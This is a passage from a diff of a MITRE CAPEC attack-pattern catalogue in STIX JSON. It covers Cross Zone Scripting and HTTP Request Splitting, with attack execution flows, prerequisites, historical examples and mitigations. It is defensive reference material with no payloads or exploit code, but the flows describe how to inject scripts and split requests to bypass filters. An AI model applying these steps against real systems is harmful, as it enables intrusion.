increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.", + "external_references": [ + { + "external_id": "CAPEC-104", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/104.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-638", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/638.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Zone Scripting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title 
that contains a script. Subsequently, when the victim attempts to use the \"add video to chat\" feature on attacker's video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. \"Add video to chat\" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find systems susceptible to the attack: Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone.

  2. Techniques
    Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place.

Experiment

  1. Find the insertion point for the payload: The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user's browser needs to be within the local machine zone.

  2. Techniques
    Finding weaknesses in functionality used by both privileged and unprivileged users.

Exploit

  1. Craft and inject the payload: Develop the payload to be executed in the higher privileged zone in the user's browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload.

  2. Techniques
    The attacker makes it as likely as possible that the vulnerable functionality into which they have injected the payload has a high likelihood of being used by the victim.
    Leverage cross-site scripting vulnerability to inject payload.
", + "x_capec_extended_description": "\n In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from \"Restful Privilege Escalation\" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must be using a zone-aware browser." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_skills_required": { + "Medium": "Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable script execution.", + "id": "course-of-action--9d62b228-ecb8-4238-bc64-ef63f9d03bd5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d53f8236-31b6-44ef-9829-434ecc01751b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d62b228-ecb8-4238-bc64-ef63f9d03bd5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone", + "id": "course-of-action--ec174eec-0e8f-4c98-bfba-3ea29348c294", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a5924dc-2691-401b-b498-a96e19330e3f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec174eec-0e8f-4c98-bfba-3ea29348c294", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone", + "id": "course-of-action--ebaa0190-21bc-40aa-835b-534ee9459aba", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ddbbaa85-70d2-430f-b63f-f76eff819192", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ebaa0190-21bc-40aa-835b-534ee9459aba", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum", + "id": 
"course-of-action--abf207ec-5477-490e-a258-3be7ce5376f4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa57cebd-a942-48ea-8782-ade74acdbddb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--abf207ec-5477-490e-a258-3be7ce5376f4", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper HTML output encoding before writing user supplied data to the page", + "id": "course-of-action--d46c76e7-68c6-4e46-a3a2-d7dd40b98d75", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a223d161-4991-4c87-8118-ea0ee66f9f31", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d46c76e7-68c6-4e46-a3a2-d7dd40b98d75", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-105", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/105.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-436", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html" + }, + { + "description": "HTTP Request Splitting", + "external_id": "24", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Request-Splitting" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Request Splitting, 2011, The Web 
Application Security Consortium", + "external_id": "REF-679", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246929/HTTP%20Request%20Splitting" + } + ], + "id": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Request Splitting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote adversary to conduct HTTP request splitting and smuggling attacks. The vulnerability is due to an input validation error in the browser that allows adversaries to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. 
In certain instances, an exploit could allow the adversary to bypass web application firewalls or other filtering devices. Microsoft has confirmed the vulnerability and released software updates.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.

  2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests with custom strings and embedded web scripts and objects in HTTP headers to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

  3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:\n \n additional HTTP Requests with their own headers\n malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)\n adversary chosen encoding (e.g., UTF-7)\n \n to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.\n Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Request Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

  2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n This entails the adversary injecting malicious user input into various standard and/or user defined HTTP headers within a HTTP Request through user input of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters and unique character encoding. This malicious user input allows for web script to be injected in HTTP headers as well as into browser cookies or Ajax web/browser object parameters like XMLHttpRequest during implementation of asynchronous requests.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.\n This differs from CAPEC-34 HTTP Response Splitting, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Splitting is an attempt to compromise aback-end HTTP agentvia HTTP Request messages.\n HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. 
HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_prerequisites": [ + "An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP headers capable of being user-manipulated.", + "HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of crafting malicious HTTP messages and monitoring HTTP messages responses." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.", + "id": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c7aff6e-7858-4273-ba44-dc920b8ff560", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: front-end HTTP agents notice ambiguous requests.", + "id": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d3cd512-2e70-4e56-a57c-507684d1f6d1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.", + "id": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b867b8e9-a2c3-4882-98c9-3d5fa142fddb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable reuse of back-end connections.", + "id": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a78056e-5c0e-44f8-800a-91b0b7178716", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Use HTTP/2 for back-end connections.", + "id": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Use the same web server software for front-end and back-end server.", + "id": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-5", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c718be44-09e6-4be5-9a91-f792b8219ef4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.", + "id": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--260f7f64-cbe9-46c3-b7b8-2528b37847d6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)", + "id": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--558063de-9f07-40ca-a209-3935e9afaddd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.", + "id": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d29447c-15a4-4126-bef5-8a3dec2bc73a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.", + "id": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-105-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c046dff-3500-4208-a8f7-e7d170ad1267", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it referes to an existing chain relationship between \"CAPEC-93 : Log Injection-Tampering-Forging\" and \"CAPEC-63 : Cross-Site 